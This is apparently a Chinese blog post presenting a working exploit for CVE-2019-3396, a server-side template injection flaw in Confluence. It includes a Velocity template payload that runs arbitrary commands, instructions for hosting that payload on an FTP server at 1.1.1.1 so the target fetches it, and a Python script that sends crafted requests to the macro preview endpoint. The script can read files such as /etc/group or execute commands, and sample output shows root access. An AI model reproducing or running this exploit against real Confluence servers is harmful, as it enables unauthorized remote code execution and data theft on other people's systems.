CVE-2019-3396 confluence SSTI RCE
1、把如下代码保存成cmd.vm 放在服务器上,可以使用https协议和ftp协议。 http不行。
#set ($e="exp")
#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $e.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
$scan.next()
#end
2、修改exp里面filename路径如: filename = 'ftp://1.1.1.1/cmd.vm'
(使用 python -m pyftpdlib -p 21)
# -*- coding: utf-8 -*-
import re
import sys
import requests
def _read(url):
result = {}
# filename = "../web.xml"
filename = 'file:////etc/group'
paylaod = url + "/rest/tinymce/1/macro/preview"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Referer": url + "/pages/resumedraft.action?draftId=12345&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
"Content-Type": "application/json; charset=utf-8"
}
data = '{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
r = requests.post(paylaod, data=data, headers=headers)
# print r.content
if r.status_code == 200 and "wiki-content" in r.text:
m = re.findall('.*wiki-content">\n(.*)\n </div>\n', r.text, re.S)
return m[0]
def _exec(url,cmd):
result = {}
filename = "ftp://1.1.1.1/cmd.vm"
paylaod = url + "/rest/tinymce/1/macro/preview"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Referer": url + "/pages/resumedraft.action?draftId=12345&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
"Content-Type": "application/json; charset=utf-8"
}
data = '{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"http://www.dailymotion.com/video/xcpa64","width":"300","height":"200","_template":"%s","cmd":"%s"}}}' % (filename,cmd)
r = requests.post(paylaod, data=data, headers=headers)
# print r.content
if r.status_code == 200 and "wiki-content" in r.text:
m = re.findall('.*wiki-content">\n(.*)\n </div>\n', r.text, re.S)
return m[0]
if __name__ == '__main__':
url = sys.argv[1]
cmd = sys.argv[2]
print _exec(url,cmd)
3、执行python REC_exp.py http://test.wiki_test.cc:8080 "whoami"
例如:
$ python REC_exp.py http://test.wiki_test.cc:8080 "id"
uid=0(root) gid=0(root) groups=0(root)
复现
参考
本文作者为Mr.Wu,转载请注明,尊守博主劳动成果!
由于经常折腾代码,可能会导致个别文章内容显示错位或者别的 BUG 影响阅读; 如发现请在该文章下留言告知于我,thank you !